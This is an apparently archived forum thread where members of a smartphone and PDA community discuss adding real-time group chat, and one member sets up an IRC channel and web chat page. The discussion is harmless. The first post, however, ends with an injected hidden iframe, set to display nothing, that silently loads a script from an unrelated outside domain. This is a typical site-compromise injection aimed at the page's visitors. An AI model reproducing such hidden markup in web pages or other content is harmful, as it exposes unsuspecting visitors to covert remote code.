+ Reply to Thread

Thread: Real-time chat

Real-time chat

One thing that I would love to see implemented on the forum is real-time chat. Many of us have become good friends through participation in this community and when I see that friends are online at the same time that I am, it would be wonderful if we could enter into a group chat. Furthermore, it would lend itself to real-time tutorials on various pda topics that could be scheduled.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Dave

Re: Real-time chat

Originally posted by dwdod
    One thing that I would love to see implemented on the forum is real-time chat. Many of us have become good friends through participation in this community and when I see that friends are online at the same time that I am, it would be wonderful if we could enter into a group chat. Furthermore, it would lend itself to real-time tutorials on various pda topics that could be scheduled.
    I like that idea myself... last night you and Markito and Steve and alanb were all "online" on my buddy list last night and I sometimes like to send a PM to multiple recipients to say hi when a bunch of my board buddies are on at the same time.... but it would be really cool to fire up a chat session.

The only thought I have off the top of my head (as far as drawbacks) is if it becomes a place where a lot of valuable info/instruction is given, but not shared with the board as a whole... so maybe if it turns out that something really useful comes out of a chat session it could be summarized and posted to the board as part of an existing FAQ, or as a new one?

In any case it would be a really nice thing for having a casual chat with a few buddies
    Please visit my picture site: Robert-O-Rama :)

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    I believe there's a freeware Java IRC app out there somewhere, that could accomplish this without costing the board, and such. I'll look into it later on today.
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

Administrator
    or we could just go to a AOL room or whatever when folks get online...

i hope you guys have me on your lists! :Smoke:

IRC/Web chat for SmartphoneSource

Hi everyone,
    I've set up a quick 'n' dirty chat board for Smartphone source. You can access it at http://www.users.cloud9.net/~legatt/SmartphoneSourceChat.html
    If you have mIRC, you can connect to it directly by typing the following:

/server irc.chatster.org
    and then connect to #SmartphoneSource.
    Enjoy!

Mike
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

Re: IRC/Web chat for SmartphoneSource

Originally posted by KB2PMD
    Hi everyone,
    I've set up a quick 'n' dirty chat board for Smartphone source. You can access it at http://www.users.cloud9.net/~legatt/SmartphoneSourceChat.html
    If you have mIRC, you can connect to it directly by typing the following:

/server irc.chatster.org
    and then connect to #SmartphoneSource.
    Enjoy!

Mike
    Thanks Mike. It looks good to me. One more thng that will need to be done is to make the URL accessible directly from the forum. The message to which I am replying, which contains the URL will get buried in no time.
    Dave

Originally posted by marctronixx
    or we could just go to a AOL room or whatever when folks get online...

i hope you guys have me on your lists! :Smoke:
    DOH!!! What would be the point Marc? You have your settings so we can't see if you are online, regardless of whether or not you are on our buddy list! Maybe you should make yourself "visible" so you can be our "buddy"

Re: Re: IRC/Web chat for SmartphoneSource

Originally posted by dwdod
    Thanks Mike. It looks good to me. One more thng that will need to be done is to make the URL accessible directly from the forum. The message to which I am replying, which contains the URL will get buried in no time.
    Always glad to help! If an admin will contact me, we can talk about a way to have the chat button launch automatically with the user's name when he/she's logged in. Then, everyone in the chat would have the same username as their SmartphoneSource username.

Re: Re: Re: IRC/Web chat for SmartphoneSource

Originally posted by KB2PMD
    Always glad to help! If an admin will contact me, we can talk about a way to have the chat button launch automatically with the user's name when he/she's logged in. Then, everyone in the chat would have the same username as their SmartphoneSource username.
    That would be sweet! I'll PM jazz and point her to this thread in case she might miss it...